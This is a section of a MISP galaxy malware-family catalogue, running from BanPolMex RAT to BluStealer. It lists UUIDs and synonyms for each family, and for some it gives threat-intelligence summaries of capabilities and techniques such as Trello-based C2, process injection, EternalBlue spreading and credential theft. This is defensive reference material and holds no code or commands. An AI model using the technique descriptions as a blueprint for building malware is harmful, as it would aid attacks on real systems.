BanPolMex RAT was delivered for victims of a watering hole campaign targeting employees of Polish and Mexican banks, that was discovered in February 2017. It is usually loaded by HOTWAX.

Internal MISP references

UUID 95d699dc-d19e-47a7-9d38-fef5008ce891 which can be used as unique global reference for BanPolMex RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Barb(ie) Downloader

Internal MISP references

UUID dbf9d453-cf02-4861-ab90-f65bb77d5971 which can be used as unique global reference for Barb(ie) Downloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BarbWire

Internal MISP references

UUID 7e68e486-08a8-4d09-997f-2b844cf86fc2 which can be used as unique global reference for BarbWire in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

barkiofork

Internal MISP references

UUID d2cdaceb-7810-4c80-9a69-0a6f27832725 which can be used as unique global reference for barkiofork in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bart

Internal MISP references

UUID 1dfd3ba6-7f82-407f-958d-c4a2ac055123 which can be used as unique global reference for Bart in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BatchWiper

Internal MISP references

UUID b74747e0-59ac-4adf-baac-78213a234ff5 which can be used as unique global reference for BatchWiper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Batel

Internal MISP references

UUID 3900aa45-a7ff-48cc-9ac0-58c7c372991e which can be used as unique global reference for Batel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BATLOADER

According to PCrisk, BATLOADER is part of the infection chain where it is used to perform the initial compromise. This malware is used to execute payloads like Ursnif. Our team has discovered BATLOADER after executing installers for legitimate software (such as Zoom, TeamViewer Visual Studio) bundled with this malware. We have found those installers on compromised websites.

Internal MISP references

UUID ce6fe6c6-a74a-4cf7-adf8-41b5433bcbb6 which can be used as unique global reference for BATLOADER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BazarBackdoor

BazarBackdoor is a small backdoor, probably by a TrickBot "spin-off" like anchor. Its called team9 backdoor (and the corresponding loader: team9 restart loader).

For now, it exclusively uses Emercoin domains (.bazar), thus the naming. FireEye uses KEGTAP as name for BazarLoader and BEERBOT for BazarBackdoor.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BazarBackdoor.

Known Synonyms
`BEERBOT`
`KEGTAP`
`Team9Backdoor`
`bazaloader`
`bazarloader`

Internal MISP references

UUID 3b1a6ba7-9617-4413-a4ad-66f5d9870bb7 which can be used as unique global reference for BazarBackdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BazarNimrod

A rewrite of Bazarloader in the Nim programming language.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BazarNimrod.

Known Synonyms
`NimzaLoader`

Internal MISP references

UUID 1735a331-9ca9-49b6-a5aa-0ddac9db8de6 which can be used as unique global reference for BazarNimrod in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BBSRAT

Internal MISP references

UUID cad1d6db-3a6c-4d67-8f6e-627d8a168d6a which can be used as unique global reference for BBSRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BBtok

360 Security Center describes BBtok as a banking trojan targeting Mexico.

Internal MISP references

UUID 0b114f49-8c4d-425d-8426-a0c4ab145f36 which can be used as unique global reference for BBtok in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Beapy

According to Symantec, Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.

Internal MISP references

UUID 404e8121-bced-4320-a984-2b490fad90f8 which can be used as unique global reference for Beapy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BEATDROP

According to Mandiant, BEATDROP is a downloader written in C that uses Atlassian's project management service Trello for C&C. BEATDROP uses Trello to store victim information and retrieve AES-encrypted shellcode payloads to be executed. BEATDROP then injects and executes downloaded payloads into a suspended process. Upon execution, BEATDROP maps a copy of ntdll.dll into memory to execute shellcode in its own process. The sample then creates a suspended thread with RtlCreateUserThread the thread points to NtCreateFile. The sample changes execution to shellcode and resumes the thread. The shellcode payload is retrieved from Trello and is targeted per victim. Once the payload has been retrieved, it is deleted from Trello.

Internal MISP references

UUID d2fd10ba-5904-4679-8758-509b72b1aa2c which can be used as unique global reference for BEATDROP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bedep

Bedep has been mostly observed in ad-fraud campaigns, although it can also generally load modules for different tasks. It was dropped by the Angler Exploit Kit.

Internal MISP references

UUID af338ac2-8103-4419-8393-fb4f3b43af4b which can be used as unique global reference for Bedep in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bee

Malware family observed in conjunction with PlugX infrastructure in 2013.

Internal MISP references

UUID 2d4aacb7-392a-46fd-b93d-33fcdaeb348f which can be used as unique global reference for Bee in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

beendoor

BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim's desktop.

Internal MISP references

UUID e2dca2b5-7ca0-4654-ae3d-91dab60dfd90 which can be used as unique global reference for beendoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BeepService

Internal MISP references

UUID 1732faab-2cf9-4d79-a085-6331da008047 which can be used as unique global reference for BeepService in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BellaCiao

Internal MISP references

UUID 4677e4e1-a5aa-405b-9140-523282740d3f which can be used as unique global reference for BellaCiao in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Belonard

Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.

Internal MISP references

UUID 40c48c99-7d33-4f35-92f1-937c3686afa7 which can be used as unique global reference for Belonard in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Berbew

Internal MISP references

UUID 8572e47c-292d-452a-b124-4e3932113c11 which can be used as unique global reference for Berbew in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Berbomthum

Internal MISP references

UUID 6944cbe7-db95-422d-8751-98c9fc4f0b12 which can be used as unique global reference for Berbomthum in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BernhardPOS

Internal MISP references

UUID e59d1d3a-6c23-4684-8be1-2f182f63ab41 which can be used as unique global reference for BernhardPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BestKorea

Internal MISP references

UUID 33308a2c-b1ef-4cbb-9240-25cb6dce55a9 which can be used as unique global reference for BestKorea in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BetaBot

Cybereason concludes that Betabot is a sophisticated infostealer malware that’s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim’s machine and steal sensitive information.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BetaBot.

Known Synonyms
`Neurevt`

Internal MISP references

UUID 837c5618-69dc-4817-8672-b3d7ae644f5c which can be used as unique global reference for BetaBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bezigate

Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files.

The Trojan may perform the following actions: List, move, and delete drives List, move, and delete files List processes and running Windows titles List services List registry values Kill processes Maximize, minimize, and close windows Upload and download files Execute shell commands Uninstall itself

Internal MISP references

UUID 29f45180-cb57-4655-8812-eb814c2a0b0e which can be used as unique global reference for Bezigate in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BfBot

Internal MISP references

UUID 95b454f6-8ffb-4ef7-8a91-14d48601a899 which can be used as unique global reference for BfBot in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot - webarchive

Associated metadata

Metadata key	Value
type	[]

BHunt

BHunt collects the crypto wallets of its victims. The malware consists of several functions/modules, e.g. a reporting module that reports the presence of crypto wallets on the target computers to the C2 server. It searches for many different cryptocurrencies (e.g. Atomic, Bitcoin, Electrum, Ethereum, Exodus, Jaxx and Litecoin). The Blackjack module is used to steal wallets, Sweet_Bonanza steals victims' browser passwords. There are also modules like the Golden7 or the Chaos_crew module.

Internal MISP references

UUID ae3fe9fa-0717-413e-94fe-6e7b607e45c6 which can be used as unique global reference for BHunt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BianLian (Windows)

BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization’s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file.

Internal MISP references

UUID fcc016ad-41a0-4bda-ad88-9542b5f560d9 which can be used as unique global reference for BianLian (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BI_D Ransomware

Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows sytem processes and kills shadow copies.

Internal MISP references

UUID 9f80bebb-dc5d-4cc1-b2dc-16bca1bbfaad which can be used as unique global reference for BI_D Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

bifrose

Internal MISP references

UUID 47e654af-8b94-4b97-a2ea-6a28c1bc8099 which can be used as unique global reference for bifrose in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BillGates

BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.

BillGates is available for *nix-based systems as well as for Windows.

On Windows, the (Bill)Gates installer typically contains the various modules as linked resources.

Internal MISP references

UUID 42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6 which can be used as unique global reference for BillGates in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Binanen

Binanen is a dropper that drops and executes a section of itself into a hidden dummy process. According to F-Secure, it executes command line tools such as (for example) asipconfig, which is useful to retrieve the network configuration. The malware aims to steal information about the machine, the username, installed software and, more generally speaking, it potentially can carry out actions on the compromised machine.

Internal MISP references

UUID a76a35e4-6ef7-45ad-9656-98584835d910 which can be used as unique global reference for Binanen in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BioData

Internal MISP references

UUID 96bcaa83-998b-4fb2-a4e7-a2d33c6427d7 which can be used as unique global reference for BioData in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

bioload

Internal MISP references

UUID 04803315-fc17-44d0-839e-534b9da4c7fc which can be used as unique global reference for bioload in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BIOPASS

BIOPASS RAT is a malware family which targets online gambling companies in China by leveraging a watering hole attack. This Remote Access Trojan (RAT) is unique in that it leverages the Open Broadcaster Software (OBS) framework to monitor the user's screen.

Internal MISP references

UUID f3cdfef4-7976-42f9-8b5e-a67d4a62b5c1 which can be used as unique global reference for BIOPASS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Biscuit

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Biscuit.

Known Synonyms
`zxdosml`

Internal MISP references

UUID f98b4092-5f32-407c-9015-2da787d70c64 which can be used as unique global reference for Biscuit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BISTROMATH

Internal MISP references

UUID fa8b2a91-ec55-41cc-b5f6-3d233cc3cc65 which can be used as unique global reference for BISTROMATH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BitPyLock

Bitpylock is a ransomware that encrypts files by using asymmetric keys and puts '.bitpy' as suffix once the encryption phase ended. The ransom note appears on the affected user's Desktop with the following name: "# # HELP_TO_DECRYPT_YOUR_FILES # .html". At the time of writing the ransom request is 0.8 BTC and the communication email is: helpbitpy@cock.li.

Internal MISP references

UUID da5adcc1-9adc-4e86-9034-08aafecc14c1 which can be used as unique global reference for BitPyLock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BITSloth

Internal MISP references

UUID 5297e3aa-6fe8-469c-8890-9c4ecff2a57f which can be used as unique global reference for BITSloth in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bitsran

SHADYCAT is a dropper and spreader component for the HERMES 2.1 RANSOMWARE radical edition.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bitsran.

Known Synonyms
`SHADYCAT`

Internal MISP references

UUID 3e072464-6fa6-4977-9b64-08f86d1062fc which can be used as unique global reference for Bitsran in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bitter RAT

Internal MISP references

UUID 265f96d1-fdd4-4dec-b7ca-51ae6f726634 which can be used as unique global reference for Bitter RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BitRAT

According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.

Furthermore, each buyer’s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.

BitRAT’s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.

Internal MISP references

UUID 8c4363f4-4f38-4a5a-bc87-16f0721bd03b which can be used as unique global reference for BitRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bizzaro

Kaspersky Labs characterizes Bizarro as yet another banking Trojan family originating from Brazil that is now found in other regions of the world. They have seen users being targeted in Spain, Portugal, France and Italy. Attempts have now been made to steal credentials from customers of 70 banks from different European and South American countries.

Internal MISP references

UUID 00fb2087-7e08-4649-ac93-9547deda7aca which can be used as unique global reference for Bizzaro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BKA Trojaner

BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BKA Trojaner.

Known Synonyms
`bwin3_bka`

Internal MISP references

UUID ea06f87c-148c-49e5-afec-7012cb2b4f0a which can be used as unique global reference for BKA Trojaner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Black Basta (Windows)

"Black Basta" is a new ransomware strain discovered during April 2022 - looks in dev since at least early February 2022 - and due to their ability to quickly amass new victims and the style of their negotiations, this is likely not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along their affiliates.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Black Basta (Windows).

Known Synonyms
`no_name_software`

Internal MISP references

UUID ada47367-7e69-4122-b5c1-4e5aeb54f922 which can be used as unique global reference for Black Basta (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackByte

Ransomware. Uses dropper written in JavaScript to deploy a .NET payload.

Internal MISP references

UUID c7732221-fbb3-4469-a1c6-260a825b290a which can be used as unique global reference for BlackByte in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackCat (Windows)

ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMWare ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.

ALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remote execute itself on other hosts on the local network.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackCat (Windows).

Known Synonyms
`ALPHV`
`Noberus`

Internal MISP references

UUID 44109c47-f4ab-41c0-8d18-b93e7dcd8e42 which can be used as unique global reference for BlackCat (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BLACKCOFFEE

a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BLACKCOFFEE.

Known Synonyms
`PNGRAT`
`ZoxPNG`
`gresim`

Internal MISP references

UUID ff660bf2-a9e4-4973-be0c-9f6618e40899 which can be used as unique global reference for BLACKCOFFEE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackEnergy

BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.

Version 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to - download and execute a remote file; - execute a local file on the infected computer; - update the bot and its plugins;

The Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.

In 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included: - operations with victim's filesystem - spreading with a parasitic infector - spying features like keylogging, screenshoots or a robust password stealer - Team viewer and a simple pseudo “remote desktop” - listing Windows accounts and scanning network - destroying the system

Typical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.

On 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.

Internal MISP references

UUID 82c644ab-550a-4a83-9b35-d545f4719069 which can be used as unique global reference for BlackEnergy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackGuard

According to Zscaler, BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients.

Internal MISP references

UUID 86048398-cfc2-4d6c-a49f-9114e2966b61 which can be used as unique global reference for BlackGuard in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackKingdom Ransomware

Internal MISP references

UUID 246b6563-edd8-49c7-9d3c-97dc1aec6b81 which can be used as unique global reference for BlackKingdom Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackLotus

Internal MISP references

UUID 6d542c85-cf94-466f-97a2-eac3c50fbea2 which can be used as unique global reference for BlackLotus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackMagic

Ransomware

Internal MISP references

UUID 80735865-325c-4829-a6df-22e5d84735e6 which can be used as unique global reference for BlackMagic in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackMatter (Windows)

According to PCrisk, BlackMatter is a piece of malicious software categorized as ransomware. It operates by encrypting data for the purpose of making ransom demands for the decryption tools. In other words, files affected by BlackMatter are rendered inaccessible, and victims are asked to pay - to recover access to their data.

During the encryption process, files are appended with an extension consisting of a random character string. For example, a file initially named "1.jpg" would appear as something similar to "1.jpg.k5RO9fVOl". After this process is complete, the ransomware changes the desktop wallpaper and created a ransom note - "[random_string].README.txt" (e.g., k5RO9fVOl.README.txt).

Internal MISP references

UUID f838f3bb-a36b-49df-8f8c-1bb8cf66b736 which can be used as unique global reference for BlackMatter (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackNET RAT

Advanced and modern Windows botnet with PHP panel developed using VB.NET. It has a lot of functionalities including: stealing/grabbing files and passwords, keylogging, cryptojacking, loading files, executing commands, etc. It is open source and emerged at the end of 2019.

Internal MISP references

UUID 656c4009-cd79-4501-9fc9-7ad2d97b634c which can be used as unique global reference for BlackNET RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackNix RAT

Internal MISP references

UUID 845ce966-fb40-4f12-b9c1-8b97263a589e which can be used as unique global reference for BlackNix RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackPOS

BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackPOS.

Known Synonyms
`Kaptoxa`
`MMon`
`POSWDS`
`Reedum`

Internal MISP references

UUID 1e62fc1f-daa7-416f-9159-099798bb862c which can be used as unique global reference for BlackPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackRemote

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackRemote.

Known Synonyms
`BlackRAT`

Internal MISP references

UUID b1302517-d5c9-44bb-833d-4396365915db which can be used as unique global reference for BlackRemote in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackRevolution

Internal MISP references

UUID 6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8 which can be used as unique global reference for BlackRevolution in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution - webarchive

Associated metadata

Metadata key	Value
type	[]

BlackRouter

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackRouter.

Known Synonyms
`BLACKHEART`

Internal MISP references

UUID 0b235fbf-c191-47c0-ae83-9386a64b1c79 which can be used as unique global reference for BlackRouter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Blackruby

Ransomware.

Internal MISP references

UUID 617d53dd-1143-4146-bbc0-39e975a26fe5 which can be used as unique global reference for Blackruby in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackShades

Internal MISP references

UUID 0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b which can be used as unique global reference for BlackShades in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackSnake

Internal MISP references

UUID 366fe903-5ab4-47d3-a0e0-8ff45b2b4a8c which can be used as unique global reference for BlackSnake in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackSoul

Internal MISP references

UUID 58701e4d-87aa-45a5-adfd-9b20f50fea91 which can be used as unique global reference for BlackSoul in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackSuit (Windows)

According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.

Internal MISP references

UUID b73202ea-e636-4e70-91b1-f29c1db4cbb1 which can be used as unique global reference for BlackSuit (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Blackworm RAT

Internal MISP references

UUID 02d2bb6d-9641-406e-9767-58aff2fad6c7 which can be used as unique global reference for Blackworm RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BleachGap

Internal MISP references

UUID cfcdbf20-304e-4ea4-bec1-d84bb78e723f which can be used as unique global reference for BleachGap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BLINDINGCAN

BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S). It uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. It sends information about the victim's environment, like computer name, IP, Windows product name and processor name. It supports around 30 commands that include operations on the victim’s filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indicis being skipped. It uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc. It contains specific RTTI symbols like ".?AVCHTTP_Protocol@@", ".?AVCFileRW@@" or ".?AVCSinSocket@@". BLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BLINDINGCAN.

Known Synonyms
`AIRDRY`
`ZetaNile`

Internal MISP references

UUID 44d22b4e-5ad4-4f05-a421-95607706378d which can be used as unique global reference for BLINDINGCAN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BLINDTOAD

BLINDTOAD is 64-bit Service DLL that loads an encrypted file from disk and executes it in memory.

Internal MISP references

UUID b34fd401-9d37-4bc6-908f-448c1697f749 which can be used as unique global reference for BLINDTOAD in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Blister

Elastic observed this loader coming with valid code signatures, being used to deploy secondary payloads in-memory.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Blister.

Known Synonyms
`COLORFAKE`

Internal MISP references

UUID 8ffc1f23-c0a6-4186-b06e-11a72c153722 which can be used as unique global reference for Blister in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BloodAlchemy

This malware family is the suspected successor to ShadowPad and Deed rat.

Internal MISP references

UUID ca547f0c-6cd1-4381-bcf1-143dd0798690 which can be used as unique global reference for BloodAlchemy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BloodyStealer

Internal MISP references

UUID ecdc0a43-8845-4dc4-a3f0-de2f0142aa4d which can be used as unique global reference for BloodyStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlueFox

BlueFox is a .NET infostealer sold on forums as a Maware-as-a-Service. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, and file grabber and loader capabilities.

Internal MISP references

UUID f9f5d767-3460-49f3-94c2-5dd91b341505 which can be used as unique global reference for BlueFox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BLUEHAZE

Mandiant associates this with UNC4191, this malware is a launcher for NCAT to establish a reverse tunnel.

Internal MISP references

UUID 3dcfef7b-d657-4ac5-b738-ef793237274b which can be used as unique global reference for BLUEHAZE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BLUELIGHT

Malware family used to deliver follow up payloads, variants using Microsoft Graph API and Google Web Apps have been observed.

Internal MISP references

UUID 9c5ec440-2bb8-4485-9811-f2fb52cf76e5 which can be used as unique global reference for BLUELIGHT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlueNoroff

This family contains the BlueNoroff toolkit used for SWIFT manipulation, as used by the Lazarus activity cluster also referred to as BlueNoroff.

Internal MISP references

UUID 862e9c13-dde6-473e-a816-a7d7043bf73c which can be used as unique global reference for BlueNoroff in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlueShell

According to AhnLab, BlueShell is a backdoor malware developed in Go language, published on Github, and it supports Windows, Linux, and Mac operating systems. Currently, the original Github repository is presumed to have been deleted, but the BlueShell source code can still be obtained from other repositories. It features an explanatory ReadMe file in Chinese, indicating the possibility that the creator is a Chinese user.

Internal MISP references

UUID 91d441a6-4244-43a2-9b96-354a2df63a4e which can be used as unique global reference for BlueShell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlueSky

Ransomware.

Internal MISP references

UUID 5c19d979-4c22-452f-b4f0-9325a46b7083 which can be used as unique global reference for BlueSky in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BLUETHER

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BLUETHER.

Known Synonyms
`CAPGELD`

Internal MISP references

UUID cf542e2d-531c-4d34-98c8-7e3cb26a32af which can be used as unique global reference for BLUETHER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BluStealer

